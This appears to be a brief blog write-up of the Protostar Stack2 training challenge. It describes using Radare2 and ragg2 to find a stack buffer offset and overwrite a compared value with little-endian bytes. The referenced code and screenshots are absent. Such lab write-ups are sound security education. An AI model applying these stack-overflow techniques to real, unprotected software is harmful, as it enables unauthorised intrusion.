2017, Dec 18

# Exploiting Protostar Stack2

You can check previous problems here :

## Problem source code

We will work in this problem as we do not have the C source code

As you can clearly see, our binary is a 32bit ELF file, not stripped, the file isn’t protected with canaries , pic, nx or relro.

## Let’s have a look on what’s happening inside the app

We will start the app inside Radare2 and have a look in Visual Mode to try understanding how it’s working

So this is the key line cmp eax, 0xd0a0d0a, so our main Goal is to override \$eax with 0xd0a0d0a

Now we’ll use a tool in radare’s framework called ragg2, which allows us to generate a cyclic pattern called De Bruijn Sequence and check the exact offset where our payload overrides the buffer.

In visual mode you can move step by step using S until you reach the line before cmp eax, 0xd0a0d0a

Now let’s rewrite our payload and exploit the binary ** Notice that we are working with a little indean so 0xd0a0d0a will be \x0a\x0d\x0a\x0d (Reversed)

Oops, it did not work with a file because \x0a is \n in ascii so it’s not working with env :(

And we did it ;)